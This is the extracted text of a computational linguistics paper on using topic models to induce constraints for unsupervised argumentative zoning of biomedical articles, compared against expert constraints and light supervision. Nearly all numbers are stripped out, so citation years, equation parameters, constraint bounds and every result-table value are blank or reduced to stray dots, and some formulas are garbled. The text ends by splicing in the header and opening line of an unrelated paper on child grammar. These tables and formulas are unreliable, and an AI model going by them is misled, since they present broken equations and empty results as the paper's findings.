the az categories induced by our model prove more valuable than those of (guo et al., a) and those in the gold standard. our work demonstrates the great potential of automatically induced declarative knowledge in both improving the performance of in- formation structure analysis and reducing reliance of human supervision. previous work automatic declarative knowledge induction learning with declarative knowledge offers effective means of reducing human supervision and improv- ing performance. this framework augments feature- based models with domain and expert knowledge in the form of, e.g., linear constraints, posterior probabilities and logical formulas (e.g. (chang et al., ; mann and mccallum, ; mann and mccallum, ; ganchev et al., )). it has proven useful for many nlp tasks including unsu- pervised and semi-supervised pos tagging, parsing (druck et al., ; ganchev et al., ; rush et al., ) and information extraction (chang et al., ; mann and mccallum, ; reichart and ko- rhonen, ; reichart and barzilay, ). however, declarative knowledge is still created in a costly manual process. we propose inducing such knowledge directly from text with minimal human involvement. this idea could be applied to almost any nlp task. we apply it here to information struc- ture analysis of scientific documents. little prior work exists on automatic constraint learning. recently, (mcclosky and manning, ) investigated the approach for timeline extraction. they used a set of gold relations and their temporal spans and applied distant learning to find approxi- mate instances for classifier training. a set of con- straint templates specific to temporal learning were also specified. in contrast, we do not use manually specified guidance in constraint learning. particu- larly, we construct constraints from latent variables (topics in topic modeling) estimated from raw text rather than applying maximum likelihood estimation over observed variables (fluents and temporal ex- pressions) in labeled data. our method is therefore less dependent on human supervision. even more recently, (anzaroot et al., ) presented a super- vised dual-decomposition based method, in the con- text of citation field extraction, which automatically generates large families of constraints and learn their costs with a convex optimization objective during training. our work is unsupervised, as opposed to their model which requires a manually annotated training corpus for constraint learning. information structure analysis various schemes have been proposed for analysing the information structure of scientific documents, in particular the patterns of topics, functions and re- lations at sentence level. existing schemes include argumentative zones (teufel and moens, ; mizuta et al., ; teufel et al., ), discourse structure (burstein et al., ; webber et al., ), qualitative dimensions (shatkay et al., ), scientific claims (blake, ), scientific concepts (liakata et al., ), and information status (mark- ert et al., ), among others. most previous work on automatic analysis of information structure relies on supervised learning (teufel and moens, ; burstein et al., ; mizuta et al., ; shatkay et al., ; guo et al., ; liakata et al., ; markert et al., ). given the prohibitive cost of manual annotation, unsupervised and minimally supervised techniques such as clustering (kiela et al., ) and topic modeling (varga et al., ; ó séaghdha and teufel, ) are highly important. however, the performance of such approaches shows a large room for improvement. our work is specifically aimed at addressing this problem. information structure learning with declar- ative knowledge recently, reichart and korhonen ( ) and guo et al. ( a) developed constrained models that integrate rich linguistic knowledge (e.g. discourse patterns, syntactic features and sentence similarity information) for more reliable unsuper- vised or transductive learning of information cate- gories in scientific abstracts and articles. guo et al. ( a) used detailed lexical constraints developed via human supervision. whether automatically in- duced declarative knowledge can rival such manual constraints is a question we address in this work. while reichart and korhonen ( ) used more general constraints, their most effective discourse constraints were tailored to scientific abstracts and are less relevant to full papers. model we introduce a topic-model based approach to declarative knowledge (dk) acquisition and describe how this knowledge can be applied to two unsuper- vised models for our task. section . describes how topic models are used to induce topics that serve as the main building blocks of our dk. section . ex- plains how the resulting topics and their key features are transformed into dk – constraints in the general- ized expectation (ge) model and bias functions in a graph clustering algorithm. . inducing information structure categories with latent dirichlet allocation latent dirichlet allocation (lda) lda is a gener- ative process widely used for discovering latent top- ics in text documents (blei et al., ). it assumes the following generative process for each document: . choose θi ∼ dirichlet(α), i ∈{ , ...,m} . choose φk ∼ dirichlet(β),k ∈{ , ...,k} . for each word wij,j ∈{ , ...,ni} (a) choose a topic zij ∼ multinomial(θi) (b) choose a word wij ∼ multinomial(φzij), where θi is the distribution of topics in document i, φk is the distribution of observed features (usually words) for topic k, zij is the topic of the j-th word in document i, and wij is the j-th word in document i. a number of inference techniques have been pro- posed for the parameter estimation of this process, e.g. variational bayes (blei et al., ) and gibbs sampling (griffiths and steyvers, ) which we use in this work. topics and information structure categories a key challenge in the application of lda to in- formation structure analysis is defining the observed features generated by the model. topics are usually defined to be distributions over all the words in a document, but in our task this can lead to undesired topics. consider, for example, the following sen- tences from the introduction section of an article: - first, exposure to bd-diol via inhalation causes an increase in hprt mutation frequency in both mice and rats ( ). - third, bd-diol is a precursor to mi, an important urinary metabolite in humans exposed to bd ( ). in a word-based topic model we can expect that most of the content words in these sentences will be gen- erated by a single topic that can be titled as “bd- diol”, or by two different topics related to “mice rat” and “human”. however, information structure categories should reflect the role of the sentence in e.g. the discourse or argument structure of the pa- per. for example, given the az scheme both sen- tences should belong to the background (bkg) cate- gory (table ). the same requirement applies to the topics induced by the topic models. features in applying lda to az, we define top- ics as distributions over: (a) words of particular syn- tactic categories; (b) syntactic (pos tag) patterns; and (c) discourse markers (citations, tables and fig- ures). below we list our features, among which pro- noun, conjunction, adjective and adverb are novel and the rest are adapted from (guo et al., a): citation a single feature that aggregates together the various citation formats in scientific articles (e.g. [ ] or (tudek )). table, figure a single feature representing any ref- erences to tables or figures in a sentence. verb verbs are central to the meaning of a sentence. each of the base forms of the verbs in the corpus is a unique feature. pronoun personal (e.g. “we”) and possessive pro- nouns (e.g. “our”) and the following adjectives (as in e.g. “our recent” or “our previous”) may indicate the ownership of the work (e.g. the author’s own vs. other people’s work), which is important for our task. each of the above words or word combinations is a unique feature. conjunction conjunctions indicate the relationship between different sentences in text. we consider two types of conjunctions: ( ) coordinating conjunctions (indicated by the pos tag “cc” in the output of the c&c pos tagger); and ( ) saturated clausal modi- fiers (indicated by the pos tag “in” and the corre- sponding grammatical relation “cmod” in the output of the c&c parser). each word that forms a con- junction according to this definition is a unique fea- ture. adjective and adverb adjectives provide descrip- tive information about objects, while adverbs may change or qualify the meaning of verbs or adjectives. each adverb and adjective that appears in more than articles in the corpus is a unique feature. modal, tense, voice previous work has demon- strated a strong correlation between tense, voice, modals and information categories (e.g. (guo et al., a; liakata et al., )). these features are in- dicated by the part-of-speech (pos) tag of verbs. for example, the phrase “may have been investi- gated” is represented as “may-md have-vbz be- vbn verb-vbn”. as a pre-processing step, each sentence in the in- put corpus was represented with the list of features it consists of. consider, for example, the following sentence from a discussion section in our data-set: - in a previous preliminary study we reported that the results of a limited proof of concept human clinical trial using sulin- dac ( - %) and hydrogen peroxide ( %) gels applied daily for three weeks on actinic keratoses (ak) involving the upper ex- tremities [ ]. before running the discussion section topic model (see below for the features considered by this model), this sentence is converted to the fol- lowing representation: [cite] previous preliminary we limited the topic models we construct are assumed to gen- we collapsed adverbs ending with -ly into the correspond- ing adjectives to reduce data sparsity. verbs were spared the frequency cut-off because rarely occurring verbs are likely to correspond to domain-specific actions that are probably indica- tive of the meth category. model features article verb, table, figure, modal, tense, voice introduction citation, pronoun, verb, modal, tense, voice discussion citation, pronoun, conjunction, adjective, adverb table : the features used in the article-level and the section-specific topic models in this paper erate these features rather than bag-of-words. topic models construction looking at the cate- gories in table it is easy to see that different com- binations of the features in topic model generation will be relevant for different category distinctions. for example, personal pronouns are particularly rel- evant for distinguishing between categories related to current vs. previous works. some distinctions between categories are, in turn, more relevant for some sections than for others. for example, the distinction between the background (bkg) and the definition of the research problem (prob) is important for the introduction section, but less important for the results section. similarly the distinction between conclusions (con) and differ- ence from previous work (diff) is more relevant for the discussion section than other sections. we therefore constructed two types of topic mod- els: section-specific and article-level models, rea- soning that some distinctions apply globally at the article level while some apply more locally at the section level. section-specific models were con- structed for the introduction section and for the dis- cussion section. table presents the features that are used with each topic model. a key issue in the application of topic models to our task is the definition of the unit of text for which θi, the distribution over topics, is drawn from the dirichlet distribution (step of the algorithm). this choice is data dependent, and the standard choice is the document level. however, for scientific arti- cles the paragraph level is a better choice, because a paragraph contains only a small subset of informa- tion structure categories while in a full article cat- egories are more evenly distributed. we therefore adopted the paragraph as our basic unit of text. the section-level and the article-level models are applied the methods section is less suitable for a section-level topic model as . % of its sentences belong to its dominant category (meth) (table ). preliminary experiments with section-level topic models for the methods and results sections did not lead to improved performance. to the collection of paragraphs in the specific section across the test set articles or in the entire set of test articles, respectively. . declarative knowledge induction most sentence-based information structure analysis approaches associate each sentence with a unique category. however, since the map assignment of topics to features associates each sentence with mul- tiple topics, we cannot directly interpret the resulting topics as categories of input sentences. in this section we present two methods for in- corporating the information conveyed by the topic models (see section . ) in unsupervised models. the first method biases a graph clustering algorithm while the second generates constraints that can be used with a ge criterion. graph clustering we use the graph clustering objective of dhillon et al. ( ) which can be opti- mized efficiently, without eigenvalues calculations: max ỹ trace(ỹ t w − / aw − / ỹ ) where a is a similarity matrix, w is a diagonal matrix of the weight of each cluster, and ỹ is an orthonormal matrix, indicating cluster membership, which is proportional to the square root of w . to make use of topics to bias the graph clustering towards the desired solution, we define the similarity matrix a, whose (i,j)−th entry corresponds to the i-th and j-th test set sentences as follows: a(i,j) = f(si,sj) + γg(si,sj,t), where si = {all the features extracted from sentence i } t = {tk|tk = {top n features associated with topic k}} f(si,sj) = |si ∩sj| g(si,sj,t) = { ∃x ∈ si∃y ∈ sj∃k x ∈ tk ∧y ∈ tk otherwise where tk consists of the n features that are as- signed the maximum probability according to the k- th topic. under this formulation, the topic model term g(·) is defined to be the indicator of whether two sentences share features associated with the same topic. if this is true, the algorithm is encour- aged to assign these sentences to the same cluster. generalized expectation a generalized expecta- tion (ge) criterion is a term in an objective function our preliminary experiments demonstrated that assigning the learned topics to the test sentences performs poorly. that assigns a score to model expectations (mann and mccallum, ; druck et al., ; bellare et al., ). given a score function g(·), a discrim- inative model pλ(y|x), a vector of feature functions f∗(·), and an empirical distribution p̃(x), the value of a ge criterion is: g(ep̃(x)[epλ(y|x)[f ∗ (x,y)]]) a popular choice of g(·) is a measure of distance (e.g. l norm) between model and reference expec- tations. the feature functions f∗(·) and the refer- ence expectations of f∗(·) are traditionally specified by experts, which provides a way to integrate declar- ative knowledge into machine learning. consider a maximum entropy (maxent) model pλ(y|x) = zλexp(λ · f(x,y)), where f(·) is a vec- tor of feature functions, λ the feature weights, and zλ the partition function. the following objective function can be used for training maxent with ge criteria on unlabeled data: max λ −g(ep̃(x)[epλ(y|x)[f ∗ (x,y)]])− ∑ j λ j σ where the second term is a zero-mean σ -variance gaussian prior on parameters. let the k-th feature function f∗k(·) be an indicator function: f ∗ k(x,y) = {xik= ∧y=yk} (x,y) where xik is the ik-th element/feature in the feature vector x. the model expectation of f∗k(·) becomes: ep̃(x)[epλ(y|x)[f ∗ k(x,y)]] = p̃(xik = )pλ(yk|xik = ) to calculate g(·), a reference expectation of f∗k(·) can be obtained after specifying (the upper and lower limits of) p(yk|xik = ): lk ≤ p(yk|xik = ) ≤ uk this type of constraints, for example, . ≤ p(con|suggest) ≤ , have been successfully ap- plied to ge-based information structure analysis by guo et al. ( a). here we build on their frame- work and our contribution is the automatic induction of such constraints by topic modeling. the association between features and topics can be transformed into constraints as follows. let wz be a set of top n key features associated with topic z – the n features that are assigned the maximum probability according to the topic. we compute the following topic-specific feature sets: az = {w|w ∈ wz ∧∀t = z w ∈ wt} – the set of features associated with topic z but not with any of the other topics; bz = ⋃ t =z wt – the set of features associated with at least one topic other than z. for every topic-feature pair (zk,wk) we therefore write the following constraint: lk ≤ p(zk|wk = ) ≤ uk we set the probability range for the k-th pair as fol- lows: if wk ∈ azk then lk = . ,uk = , if wk ∈ bzk then lk = ,uk = . , in any other case lk = ,uk = . the values of lk and uk were selected such that they reflect the strong association between the key fea- tures and their topics. our basic reasoning is that if a sentence is represented by one of the key unique features of a given topic, it is highly likely to be as- sociated with that topic. likewise, a sentence is un- likely to be associated with the topic of interest if it has a key feature for any other topics. . summary of contribution learning with declarative knowledge is an active re- cent research avenue in the nlp community. in this framework feature-based models are augmented with domain and expert knowledge encoded most often by constraints of various types. the human effort involved with this framework is the manual specification of the declarative knowledge. this re- quires deep understanding of the domain and task in question. the resulting constraints typically spec- ify detailed associations between lexical, grammat- ical and discourse elements and the information to be learned (see, e.g., tables and of (guo et al., a) and table of (chang et al., )). our key contribution is the automatic induction of declarative knowledge that can be easily integrated into unsupervised models in the form of constraints and bias functions. our model requires minimal do- main and task knowledge. we do not specify lists of words or discourse markers (as in (guo et al., a)) but, instead, our model automatically asso- ciates latent variables both with linguistic features, taken from a very broad and general feature set (e.g. bkg prob meth res con cn diff fut article . . . . . . . . ( ) introduction . . . . . . - - ( ) methods . . . . . . . - ( ) results . . . . . . . - ( ) discussion . . . . . . . . ( ) table : distribution of sentences (shown in percentages) in articles and individual sections in the az-annotated corpus. the total number of sentences in each section appears in parentheses below the section name. all the words that belong to a given set of pos tags), and with sentences in the input text. in the next sec- tion we present our experiments which demonstrate the usefulness of this declarative knowledge. experiments data and models we used the full paper cor- pus earlier employed in (guo et al., a) which includes annotated sentences (with reported inter-annotator agreement: κ = . ) from biomedical journal articles from the cancer risk as- sessment domain. one third of this corpus was saved for a development set on which our model was de- signed and its hyperparameters were tuned (see be- low). the corpus is annotated according to the argu- mentative zoning (az) scheme (teufel and moens, ; mizuta et al., ) described in table . ta- ble shows the distribution of az categories and the total number of sentences in each individual section. since section names vary across articles, we grouped similar sections before calculating the statistics (e.g. materials and methods sections were grouped under method). the table demonstrates that although there is a dominant category in each section (e.g. bkg in introduction), up to . % of the sentences in each section fall into other categories. feature extraction we used the c&c pos tag- ger and parser trained on biomedical literature (cur- ran et al., ; rimell and clark, ) in the fea- ture extraction process. lemmatization was done with morpha (minnen et al., ). baselines we compared our models (topicgc and topicge) against the following baselines: (a) an unconstrained unsupervised model – the unbiased version of the graph clustering we use for topicgc (i.e. where g(·) is omitted, gc); (b) the unsuper- vised constrained ge method of (guo et al., a) where the constraints were created by experts (ex- pertge); (c) supervised unconstrained maximum entropy models, each trained to predict categories in a particular section using sentences from that section, as in the lightly supervised case in (guo et al., a) (maxent); and (d) a baseline that assigns all the sentences in a given section to the most fre- quent gold-standard category of that section (table ). this baseline emulates the use of section names for information structure classification. our constraints, which we use in the topicge and topicgc models, are based on topics that are learned on the test corpus. while having access to the raw test text at training time is a standard as- sumption in many unsupervised nlp works (e.g. (klein and manning, ; goldwater and grif- fiths, ; lang and lapata, )), it is impor- tant to quantify the extent to which our method de- pends on its access to the test set. we therefore con- structed the topicge* model which is identical to topicge except that the topics are learned from an- other collection of biomedical articles contain- ing sentences. like our test set, these articles are from the cancer risk assessment domain - all of them were published in the toxicol. sci. journal in the years - and were retrieved using the pubmed search engine with the key words “cancer risk assessment”. there is no overlap between this new dataset and our test set (guo et al., a). models and parameters for graph clustering, we used the graclus software (dhillon et al., ). for ge and maxent, we used the mallet software (mccallum, ). the γ parameter in the graph clustering was set to using the development data. several values of this parameter in the range of [ , ] yielded very similar performance. the number of key features considered for each topic, n, was set to , and for the article, introduc- tion section, and discussion section topic models, respectively. this difference reflects the number of feature types (table ) and the text volume (table ) of the respective models. evaluation we evaluated the overall accuracy as well as the category-level precision, recall and f- score for each section. topicgc, topicge, top- icge* and the baseline gc methods are unsuper- introduction method result discussion gc tgc tge tge* ege mfc gc tgc tge tge* ege mfc gc tgc tge tge* ege mfc gc tgc tge tge* ege mfc f bkg . . . . . . - - - - . - - - - - . - . . . . . - prob . . . . . - - - - - . - - - - - . - - - - - . - meth - . . . . - . . . . . . . - . . . - - - - - . - res - - - - . - - - - - . - . . . . . . - - - - . - con - . . . . - - - - - - - . . . . . - . . . . . . cn - - - - - - - - - - - - - - - - . - - . . . . - diff - - - - - - - - - - - - - - - - - - - - - - . - fut - - - - - - - - - - - - - - - - - - - - - - . - acc. . . . . . . . . . . . . . . . . . . . . . . . . table : performance (class based f -score and overall accuracy (acc.)) of unbiased graph clustering (gc), graph clustering with declarative knowledge learned from topic modeling (topicgc model, tgc column), generalized expectation using constraints learned from topic modeling (topicge, tge) and the same model where constraints are learned using an external set of articles (topicge*, tge*), ge with constraints created by experts (expertge, ege - a replication of (guo et al., a)) and the most frequent gold standard category of the section (mfc) vised and therefore induce unlabeled categories. to evaluate their output against the gold standard az annotation we first apply a standard greedy many- to-one mapping (naming) scheme in which each in- duced category is mapped to the gold category that shares the highest number of elements (sentence) with it (reichart and rappoport, ). the to- tal number of induced topics was with each topic model inducing three topics. for light supervision, a ten-fold cross-validation scheme was applied. in addition, we compare the quality of the auto- matically induced and manually constructed declar- ative knowledge in the context of customized sum- marization (contractor et al., ) where sum- maries of specific types of information in an article are to be generated (we focused on the article’s con- clusions). while an intuitive solution would be to summarize the discussion section of a paper, only . % of its sentences belong to the gold standard conclusion category (table ). for our experiment, we first generated five sets of sentences. the first four sets consist of the ar- ticle sentences annotated with the con category ac- cording to: topicge or topicgc or expertge or the gold standard annotation. the fifth set is the discus- sion section. we then used microsoft autosumma- rize (microsoft, ) to select sentences from each of the five sets such that the number of words in each summary amounts for % of the words in the input. the number of gold standard az categories is . however, we wanted each of our topic models to induce the same number of topics in order to reduce the number of parameters to the required minimum. for evaluation, we asked an expert to summarize the conclusions of each article in the corpus. we then evaluated the five summaries against the gold- standard summaries written by the expert in terms of various rouge scores (lin, ). results we report here the results for our constrained unsu- pervised models compared to the baselines. we start with quantitative evaluation and continue with qual- itative demonstration of the topics learned by the topic models and their key features which provide the substance for the constraints and bias functions used in our information structure models. unsupervised learning results table presents the performance of the four main unsupervised learning models discussed in this paper: gc, top- icgc, topicge, and expertge of (guo et al., a). our models (topicgc and topicge) out- perform the expertge when considering category based f-score for the dominant categories of each section. expertge is most useful in identifying the less frequent categories of each section (table ), which is in line with (guo et al., a). the overall sentence-based accuracy of topicge is significantly higher than that of expertge for all four sections (bottom line of the table). furthermore, for all four sections it is one of our models (topicgc or top- icge) that provides the best result under this mea- sure, among the unsupervised models. the table further provides a comparison of the un- supervised models to the mfc baseline which as- signs all the sentences of a section to its most fre- introduction method result discussion topicge light topicge light topicge light topicge light p r f p r f p r f p r f p r f p r f p r f p r f bkg . . . . . . - - - - - - - - - - - - . . . . . . prob . . . . . . - - - - - - - - - . . . - - - - - - meth . . . . . . . . . . . . . . . . - - - - - - res - - - - - - - - - - - - . . . . . . - - - - - - con . . . . . . - - - - - - . . . . . . . . . . . . cn - - - - - - - - - - - - - - - - - - . . . . . . diff - - - - - - - - - - - - - - - - - - - - - - - - fut - - - - - - - - - - - - - - - - - - - - - - - - acc. . . . . . . . . table : performance (class based precision, recall and f-score as well as overall accuracy (acc.)) of the topicge model and of an unconstrained maxent model trained with light supervision (total of sentences - training sentences for each section-level model). the same pattern of results holds when the maxent is trained with up to sentences ( sentences for each section-level model). topicge topicgc expertge section gold r p f r p f r p f r p f r p f rouge- . . . . . . . . . . . . . . . rouge- . . . . . . . . . . . . . . . rouge-l . . . . . . . . . . . . , . . table : rouge scores of zone (topicge, topicgc, expertge or gold standard) and discussion section based sum- maries. topicge provides the best summaries. topicgc outperforms expertge and the discussion section systems and in two measures the gold categorization based system as well. result patterns with rouge( , ,w- . , s* and su*) are very similar to those of the table. the differences between topicge and expertge are statistically significant using t-test with p < . . the differences between topicge and gold, as well as between expertge and gold are not statistically significant. quent category according to the gold standard. this baseline sheds light on the usefulness of section names for our task. as is evident from the table, while this baseline is competitive with the unsuper- vised models in terms of accuracy, its class-based f-score performance is quite poor. not only does it lag behind the unsupervised models in terms of the f-score of the most frequent classes of the introduc- tion and discussion sections, but it does not iden- tify any of the classes except from the most frequent ones in any of the sections - a task the unsupervised models often perform with reasonable quality. finally, the table also presents the performance of the topicge* model for which constraints are leaned from an external data set - different from the test set. the results show that there is no substantial difference between the performance of the topicge and topicge* models. while topicge achieves better f-scores in five of the cases in the table, top- icge* is better in four cases and the performance is identical in two cases. section level accuracies are better for topicge in two of the four sections, but the difference is only - %. comparison with supervised learning table compares the quality of unsupervised constrained- based learning with that of lightly supervised feature-based learning. since our models, topicgc and topicge, perform quite similarly, we included only topicge in this evaluation. the lightly su- pervised models (maxent classifiers) were trained with a total of sentences - for each section- specific classifier. the table demonstrates that top- icge outperforms maxent with light supervision in terms of class based f-scores in the introduction and discussion sections. in the methods section, where . % of the sentences belong to the most frequent category, and in the results section, the models per- form quite similarly. overall accuracy numbers are quite similar for both models with maxent doing better for the results section and topicge for the discussion section. these results further demon- strate that unsupervised constrained learning pro- vides a practical solution to information structure analysis of scientific articles. extractive summarization evaluation table presents the average rouge scores for zone- based (topicge, topicgc, expertge and gold) and section-based summaries across our test set articles. topic features {do} be {done}{doing}{be done}{have been done} induce {may do}{to do} show have {have done} increase {did} suggest indicate report cause include inhibit find observe involve associate activate demonstrate result use lead play {could do} know {do do} form contribute {can do}{would do} promote reduce {were done} {done} {doing} {did} use be describe contain perform incubate {do} determine analyze follow add isolate purchase wash accord {to do} treat collect remove prepare obtain measure store stain centrifuge transfer detect purify assess supplement carry dissolve plate receive kill {did}{done} be {doing}{were done} [tab fig] {do} show increase observe compare {to do} expose use have find {did do} treat {be done} report follow drink reduce result administer decrease determine measure include evaluate affect detect induce indicate associate provide reveal suggest occur table : topics and key features extracted by the article-level model (including modal, tense and voice marked in curly brackets, reference to tables or figures marked in square brackets, and verbs in the base form) topic features [no cite] {did} (we) {done}{do}{doing} use {were done} (present) {to do} investigate be (mammary) determine provide (our) treat compare examine {did}{done} [cite] {doing}{were done} be expose find [no cite] drink increase report (recent) (previous) admin- ister {do} contain evaluate (early) {do} [cite] be {done} [no cite] {doing} {be done} {have been done} induce {have done} (it) show {may do} have {to do} include increase (their) associate table : topics and key features extracted by the section-specific topic model of the introduction section (including citations marked in square brackets, pronouns and the follow-up adjective modifiers marked in parentheses, modal, tense and voice marked in curly brackets, and verbs in their base form) topic features (we) [no cite] (our) higher (mammary) as because (first) significant possible high (early) (positive) most [cite] present (present) (previous) similar different (its) although consistent furthermore greater due most whereas [no cite] not also (it) but however more (their) both therefore only thus significant lower table : topics and key features extracted by the section-specific topic model of the discussion section (including citations marked in square brackets, pronouns and the follow-up adjective modifiers marked in parentheses, and con- junctions, adjectives and adverbs) topicge and topicgc based summaries outperform the other systems, even the one that uses gold stan- dard information structure categorization. a poten- tial explanation for the better performance of our models compared to expertge is that the relative strength of our models is in identifying the major category of each section while expertge is better at identifying low or medium frequency categories. qualitative analysis we next provide a qualita- tive analysis of the topics induced by our topic mod- els — the article-level model as well as the section- level models — and their key features. note that both our models, topicge and topicgc, assume that the induced topics provide a good approxima- tion of the information structure categories and build their constraints (expert knowledge) from these top- ics accordingly. below we examine this assumption. table presents the topics and key features ob- tained from global topic modeling applied to full ar- ticles. the table reveals a strong correlation between present/future tense and topic , and between past tense and topics and (modal, tense and voice features). the table further demonstrates that top- ics and are linked to verbs that describe research findings, such as “show” and “demonstrate” in topic , and “report” and “indicate” in topic , whereas topic seems related to verbs that describe methods and experiments such as “use” and “prepare“. the feature corresponding to tables and figures [tab fig] is only seen in topic . based on these observations, topics , and seem to be related to az categories con, meth and res respectively. tables and present the topics and the key fea- tures obtained from the section-specific topic mod- eling for the introduction and discussion sections. due to space limitations we cannot provide a de- tailed analysis of the information included in these tables, but it is easy to see that they provide evi- dence for the correlation between topics in the sec- tion specific models and az categories. table demonstrates that for the introduction section topic correlates with the author’s work and topics and with previous work. table shows that for the discussion section topics and well correlate with the az con category and topic with the bkg, cn and diff categories. our analysis therefore demon- strates that the induced topics are well aligned with the actual categories of the az classification scheme or with distinctions (e.g. the author’s own work vs. works of others) that are very relevant for this scheme. note that we have not seeded our models with word-lists and the induced topics are therefore purely data-driven. discussion we presented a new framework for automatic in- duction of declarative knowledge and applied it to constraint-based modeling of the information struc- ture analysis of scientific documents. our main con- tribution is a topic-model based method for unsuper- vised acquisition of lexical, syntactic and discourse knowledge guided by the notion of topics and their key features. we demonstrated that the induced top- ics and key features can be used with two differ- ent unsupervised learning methods – a constrained unsupervised generalized expectation model and a graph clustering formulation. our results show that this novel framework rivals more supervised alterna- tives. our work therefore contributes to the impor- tant challenge of automatically inducing declarative knowledge that can reduce the dependence of ml algorithms on manually annotated data. the next natural step in this research is generaliz- ing our framework and make it applicable to more applications, domains and machine learning mod- els. we are currently investigating a number of ideas which will hopefully lead to better natural language learning with reduced human supervision. references sam anzaroot, alexandre passos, david belanger, and andrew mccallum. . learning soft linear con- straints with application to citation field extraction. in acl, pages – . kedar bellare, gregory druck, and andrew mccallum. . alternating projections for learning with expec- tation constraints. in proceedings of the th con- ference on uncertainty in artificial intelligence, pages – . catherine blake. . beyond genes, proteins, and abstracts: identifying scientific claims from full-text biomedical articles. journal of biomedical informat- ics, ( ): – . david m. blei, andrew y. ng, and michael i. jordan. . latent dirichlet allocation. journal of machine learning research, : – . jill burstein, daniel marcu, and kevin knight. . finding the write stuff: automatic identification of discourse structure in student essays. ieee intelligent systems, ( ): – . ming-wei chang, lev ratinov, and dan roth. . guiding semi-supervision with constraint- driven learning. in acl, pages – . danish contractor, yufan guo, and anna korhonen. . using argumentative zones for extractive sum- marization of scientific articles. in coling, pages – . james curran, stephen clark, and johan bos. . linguistically motivated large-scale nlp with c&c and boxer. in proceedings of the acl demo and poster sessions, pages – . inderjit s. dhillon, yuqiang guan, and brian kulis. . weighted graph cuts without eigenvectors: a multilevel approach. ieee transactions on pat- tern analysis and machine intelligence, ( ): – . gregory druck, gideon mann, and andrew mccallum. . learning from labeled features using gener- alized expectation criteria. in proceedings of the st annual international acm sigir conference on research and development in information retrieval, pages – . kuzman ganchev, joão graça, jennifer gillenwater, and ben taskar. . posterior regularization for struc- tured latent variable models. journal of machine learning research, : – . sharon goldwater and tom griffiths. . a fully bayesian approach to unsupervised part-of-speech tag- ging. in acl, pages – . thomas l griffiths and mark steyvers. . find- ing scientific topics. proceedings of the national academy of sciences, (suppl ): – . yufan guo, anna korhonen, maria liakata, ilona silins karolinska, lin sun, and ulla stenius. . identify- ing the information structure of scientific abstracts: an investigation of three different schemes. in bionlp, pages – . yufan guo, anna korhonen, and thierry poibeau. a. a weakly-supervised approach to argumenta- tive zoning of scientific documents. in emnlp, pages – . yufan guo, anna korhonen, ilona silins, and ulla ste- nius. b. weakly-supervised learning of infor- mation structure of scientific abstracts–is it accurate enough to benefit real-world tasks in biomedicine? bioinformatics, ( ): – . yufan guo, roi reichart, and anna korhonen. a. improved information structure analysis of scientific documents through discourse and lexical constraints. in naacl hlt, pages – . yufan guo, ilona silins, ulla stenius, and anna korho- nen. b. active learning-based information struc- ture analysis of full scientific articles and two applica- tions for biomedical literature review. bioinformatics, ( ): – . kenji hirohata, naoaki okazaki, sophia ananiadou, and mitsuru ishizuka. . identifying sections in sci- entific abstracts using conditional random fields. in ijcnlp, pages – . douwe kiela, yufan guo, ulla stenius, and anna ko- rhonen. . unsupervised discovery of informa- tion structure in biomedical documents. bioinformat- ics, page btu . dan klein and christopher manning. . corpus- based induction of syntactic structure: models of de- pendency and constituency. in acl, pages – . joel lang and mirella lapata. . similarity-driven semantic role induction via graph partitioning. com- putational linguistics, ( ): – . maria liakata, simone teufel, advaith siddharthan, and colin batchelor. . corpora for conceptualization and zoning of scientific papers. in lrec, pages – . maria liakata, shyamasree saha, simon dobnik, colin batchelor, and dietrich rebholz-schuhmann. . automatic recognition of conceptualization zones in scientific articles and two life science applications. bioinformatics, ( ): – . jimmy lin, damianos karakos, dina demner-fushman, and sanjeev khudanpur. . generative content models for structural analysis of medical abstracts. in bionlp, pages – . chin-yew lin. . rouge: a package for auto- matic evaluation of summaries. in text summarization branches out: proceedings of the acl- workshop, pages – . gideon s mann and andrew mccallum. . simple, robust, scalable semi-supervised learning via expecta- tion regularization. in icml, pages – . gideon s. mann and andrew mccallum. . general- ized expectation criteria for semi-supervised learning of conditional random fields. in acl, pages – . katja markert, yufang hou, and michael strube. . collective classification for fine-grained information status. in acl, pages – . andrew kachites mccallum. . mal- let: a machine learning for language toolkit. http://mallet.cs.umass.edu. david mcclosky and christopher d. manning. . learning constraints for consistent timeline extraction. in emnlp-conll, pages – . microsoft. . autosummarize: automatically summarize a document. https://support.office.com/en- us/article/automatically-summarize-a-document- b f ae-ec b- cc-b a- eed d . guido minnen, john carroll, and darren pearce. . applied morphological processing of english. natural language engineering, ( ): – . yoko mizuta, anna korhonen, tony mullen, and nigel collier. . zone analysis in biology articles as a basis for information extraction. international journal of medical informatics on natural language process- ing in biomedicine and its applications, ( ): – . diarmuid ó séaghdha and simone teufel. . unsu- pervised learning of rhetorical structure with un-topic models. in proceedings of coling : technical papers, pages – . roi reichart and regina barzilay. . multi-event ex- traction guided by global constraints. in naacl hlt, pages – . roi reichart and anna korhonen. . document and corpus level inference for unsupervised and transduc- tive learning of information structure of scientific doc- uments. in coling, pages – . roi reichart and ari rappoport. . the nvi cluster- ing evaluation measure. in conll, pages – . laura rimell and stephen clark. . porting a lexicalized-grammar parser to the biomedical domain. journal of biomedical informatics, ( ): – . patrick ruch, clia boyer, christine chichester, imad tbahriti, antoine geissbhler, paul fabry, julien gob- eill, violaine pillet, dietrich rebholz-schuhmann, christian lovis, and anne-lise veuthey. . using argumentation to extract key sentences from biomedi- cal abstracts. international journal of medical infor- matics, ( - ): – . alexander rush, roi reichart, michael collins, and amir globerson. . improved parsing and pos tag- ging using inter-sentence consistency constraints. in emnlp-conll, pages – . hagit shatkay, fengxia pan, andrey rzhetsky, and w john wilbur. . multi-dimensional classifica- tion of biomedical text: toward automated, practical provision of high-utility text to diverse users. bioin- formatics, ( ): – . imad tbahriti, christine chichester, frédérique lisacek, and patrick ruch. . using argumentation to retrieve articles with similar citations. international journal of medical informatics, ( ): – . simone teufel and marc moens. . summariz- ing scientific articles: experiments with relevance and rhetorical status. computational linguistics, ( ): – . simone teufel, advaith siddharthan, and colin batche- lor. . towards domain-independent argumenta- tive zoning: evidence from chemistry and computa- tional linguistics. in emnlp, pages – . andrea varga, daniel preotiuc-pietro, and fabio ciravegna. . unsupervised document zone iden- tification using probabilistic graphical models. in lrec, pages – . bonnie webber, markus egg, and valia kordoni. . discourse structure and language technology. natural language engineering, ( ): – . transactions of the association for computational linguistics, ( ) – . action editor: sharon goldwater. submitted / ; revised / ; published / . c© association for computational linguistics. modeling child divergences from adult grammar sam sahakian university of wisconsin-madison sahakian@cs.wisc.edu benjamin snyder university of wisconsin-madison bsnyder@cs.wisc.edu abstract during the course of first language acquisi- tion, children 